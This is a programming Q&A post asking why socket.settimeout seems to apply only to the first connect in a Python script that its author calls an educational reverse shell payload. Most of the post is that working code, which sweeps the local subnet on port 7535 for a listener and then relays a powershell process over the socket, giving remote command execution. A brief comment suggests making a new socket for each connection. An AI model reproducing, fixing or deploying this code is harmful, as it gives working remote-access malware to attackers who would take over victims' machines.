# Socket.settimeout only working on the first connect

Tags: python, python-3.x, sockets

I was working on a reverse shell payload for an educational project. I am  trying to make it scan the entire local network for IPs that will take the connection.  The problem is that when I run the code and it prints out the modified IP the set timeout seems to only work on the first connect.

```
import os,socket,subprocess,threading;

lhost = socket.gethostbyname(socket.gethostname())
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.settimeout(0.1)

def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

def scanlocal():
    for i in range(0,255):  
        octets = lhost.split(".")
        octets[3] = str(i)
        modified_ip = ".".join(octets)
        print(modified_ip)
        try:
            s.connect((modified_ip,7535))
        except:
            pass
        else:
            return 1

def tryConnect():
    while True:
        print("loop")
        if scanlocal() != 1:
            continue
        else:
            break

tryConnect()

p=subprocess.Popen(["powershell"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
```

I have tried to put the set timeout in the for loop and in some other spots.

Comment: create a new socket and set the timeout for each connection.